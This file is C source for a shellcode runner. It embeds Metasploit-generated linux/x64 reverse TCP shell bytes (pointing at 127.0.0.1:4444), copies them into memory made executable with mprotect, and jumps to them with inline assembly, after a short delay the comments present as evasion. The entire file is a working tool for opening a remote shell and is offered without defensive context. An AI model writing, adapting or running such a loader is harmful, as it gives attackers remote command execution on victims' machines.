/*
+-----------------------------------------------------------------------+
| This program is free software: you can redistribute it and/or modify  |
| it under the terms of the GNU General Public License as published by  |
| the Free Software Foundation, either version 3 of the License, or     |
| (at your option) any later version.                                   |
|                                                                       |
| This program is distributed in the hope that it will be useful,       |
| but WITHOUT ANY WARRANTY; without even the implied warranty of        |
| MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the         |
| GNU General Public License for more details.                          |
|                                                                       |
| You should have received a copy of the GNU General Public License     |
| along with this program.  If not, see <http://www.gnu.org/licenses/>. |
+-----------------------------------------------------------------------+
*/

// COMPILED WITH GCC
// Let it Sleeps! Before The Call!

/*
 * run gcc -D <os> -D <art> [...]
 *
 * <os>:
 * 		linux:		OS_NUX
 * 		windows:	OS_WIN
 * 		macos:		OS_MAC
 * <art>:
 * 		32bit:		ART_32
 * 		64bit:		ART_64
 *
 * linux amd_64 example: gcc -D OS_NUX -D ART_64 -lcurses 3_smc_linux_rshell.c -o smc

 *
 * ATTENTION: You should set both art and os flags, when you try to compile code
 */

#include <stdio.h>

#if defined OS_NUX
#include <curses.h>
#include <sys/mman.h>
#include <errno.h>

#elif defined OS_WIN
#include <conio.h>

#elif defined OS_MAC
#include <conio.h>
#endif

#include <string.h>

/*
 * linux/x64/shell_reverse_tcp - 74 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LHOST=127.0.0.1, LPORT=4444,
 * ReverseConnectRetries=5, PrependSetresuid=false,
 * PrependSetreuid=false, PrependSetuid=false,
 * PrependChrootBreak=false, AppendExit=false,
 * InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] =
    "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
    "\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6\x6a\x10"
    "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
    "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
    "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";

int buf_len = 74;

void msleep(unsigned int n)
{
    while(n>0)--n;
}

int main()
{
    int func_len = buf_len;
    void (*func)(void*) = NULL;

    func = malloc(func_len);
    memset(func, 0, func_len);
    memcpy(((unsigned char*)func), buf, func_len);

    printf("Jumping...\n");

    msleep(13);

#ifdef OS_NUX
    // linux
    unsigned page = (unsigned)func & ~( getpagesize() - 1 );
    if( mprotect( (char*)page, getpagesize(), PROT_READ | PROT_WRITE | PROT_EXEC ) )
	{
	    printf("mprotect failed [%d]\n", errno);
	    exit(0);
	}
#endif

    int out;

#ifdef ART_32
    asm (
	 "movl %1, %%ebx;"
	 "jmp *%%ebx;"
	 : "=r" (out)
	 : "r" (func)
	 : "%ebx"
	 );
#elif ART_64
    asm (
	 "mov %1, %%rbx;"
	 "jmp *%%rbx;"
	 : "=r" (out)
	 : "r" (func)
	 : "%rbx"
	 );
#endif
    getch();
    return 0;
}
